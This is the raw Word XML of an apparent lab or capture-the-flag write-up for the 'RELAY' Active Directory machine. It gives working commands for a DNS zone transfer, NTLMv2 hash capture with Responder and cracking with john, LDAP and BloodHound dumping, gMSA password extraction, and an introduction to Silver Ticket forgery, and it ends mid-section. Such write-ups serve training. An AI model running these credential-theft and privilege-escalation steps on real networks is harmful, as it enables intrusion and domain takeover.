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RELAY</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine.If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kx3qi05ydiq2"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i77zrvif215b"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3111500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="69"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40000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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need to map the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">address to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">domain </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">name by adding a line to the hosts file, as illustrated in the image.</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36900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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Zone transfer from the primary server to one of the nameservers:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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dig axfr relay.uhclabs @relay.uhclabs</w:t>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70200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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find a new subdomain → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cert.relay.uhclabs</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so we will add it to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/hosts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98800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="52"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subdomain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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67000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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see that it asks us to set the parameter → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">crt_file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, passing the path where the certificate is located. So we can start a Python server and verify whether any request reaches us.</w:t>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6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B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
        </w:rPr>
      </w:pPr>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2590800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
        </w:rPr>
      </w:pPr>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2311400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Responder</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is capable of many things, such as prompting users with fake dialogs to obtain plaintext passwords. In its default configuration, it will detect LLMNR and NBT-NS traffic. It will respond on behalf of servers the victim is searching for and capture their NTLMv2 hashes.</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These hashes must be brute-forced before they can be used. This contrasts with passwords extracted from the Windows registry for local accounts, where you can perform </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pass-the-hash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacks.</w:t>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978400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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One way to obtain an NTLMv2 hash is to make the user visit our SMB share:</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\\&lt;IP-VPN&gt;\share</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87600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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25600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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NTLMv2 hash in hand, we can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to crack it.</w:t>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93900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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u0y92c513xh5" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>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o6piujotn7v3" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LDAPDomainDump</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an</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Active Directory</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> domain, a lot of interesting information can be retrieved via LDAP by any authenticated user (or machine). This makes LDAP an interesting protocol for information gathering during the reconnaissance phase of an internal network pentest. One problem is that LDAP data is generally not available in an easy-to-read format.</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ldapdomaindump</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a tool designed to solve this problem by collecting and analyzing information available via LDAP and displaying it in a human-readable HTML format, as well as machine-readable JSON and CSV/TSV/greppable files.</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ldapdomaindump -u 'RELAY\op' -p '1qaz@WSX' -at SIMPLE ldap://&lt;IP&gt;</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1800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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browser to visualize it more clearly =)</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59100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="66"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file → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">domain_users</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we find our first flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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08100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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ze48xtu0w5w1" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BloodHound</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">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BloodHound uses graph theory to reveal hidden and often unintended relationships in an Active Directory or Azure environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to identify quickly. Defenders use it to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to gain a deeper understanding of privilege relationships in an Active Directory or Azure environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId25">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:i w:val="1"/>
            <w:iCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/fox-it/BloodHound.py</w:t>
        </w:r>
      </w:hyperlink>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i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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hyperlink r:id="rId26">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://bloodhound.readthedocs.io/en/latest/installation/linux.html</w:t>
        </w:r>
      </w:hyperlink>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run BloodHound in Python (installed using pip3) and extract the domain data. It is worth mentioning that in this lab, the domain configuration connects the Domain Controller, clients, and our attacker machine essentially on the same network. To retrieve domain data, any domain user can be used.</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bloodhound-python -u op -p '1qaz@WSX' -ns &lt;IP&gt; -d relay.uhclabs</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22500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="73"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console neo4j</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06700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="72"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access the graphical interface → </w:t>
      </w:r>
      <w:hyperlink r:id="rId29">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://localhost:7474/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  and authenticate.</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533900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="67"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we can open BloodHound and load our dump files by simply dragging them into the interface.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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60600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="71"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v5cxlnaew6u3" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>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2501900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="57"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862i5sezbwys" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find Shortest Paths to Domain Admins</w:t>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means BloodHound will map Domain Admins and discovered users, allowing us to determine which path we want to follow in order to reach Domain Administrator with minimal resistance.</w:t>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35400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="65"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can see that the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">svc_webapp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is part of the groups → Administrators and Domain Admins.</w:t>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can read the GMSAPassword of this user =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">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midoj7xlfxc" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Group Managed Service Accounts (gMSA)</w:t>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Group Managed Service Accounts (gMSA) were introduced in Windows Server 2016 and can be leveraged on Windows Server 2012 and later. gMSAs provide a more secure way to run automated tasks, services, and applications.</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Why are gMSAs more secure? Because their passwords are fully managed by Windows. gMSA passwords are randomly generated, automatically rotated, and do not need to be known by any user. The service accounts themselves are “installed” on the server, which must query Active Directory for password information at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId34">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/micahvandeusen/gMSADumper</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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D">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python3 gMSADumper.py -u op -p "1qaz@WSX" -d relay.uhclabs</w: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dkvxj5cgtsbo" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>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2019300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64"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uzfb34dtm7th" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Silver Ticket</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Silver Ticket attack is based on creating a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> valid TGS for a service once the service NTLM hash is obtained </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(such as a computer account hash). Thus, it is possible to gain </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">access </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to that service by forging a custom TGS as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">any user.</w:t>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this case, the NTLM hash of a computer account (which is a type of user account in AD) has been obtained. Therefore, it is possible to create a ticket to log into that machine with administrator privileges through the SMB service.</w:t>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hyperlink r:id="rId36">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://gettgt.py/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
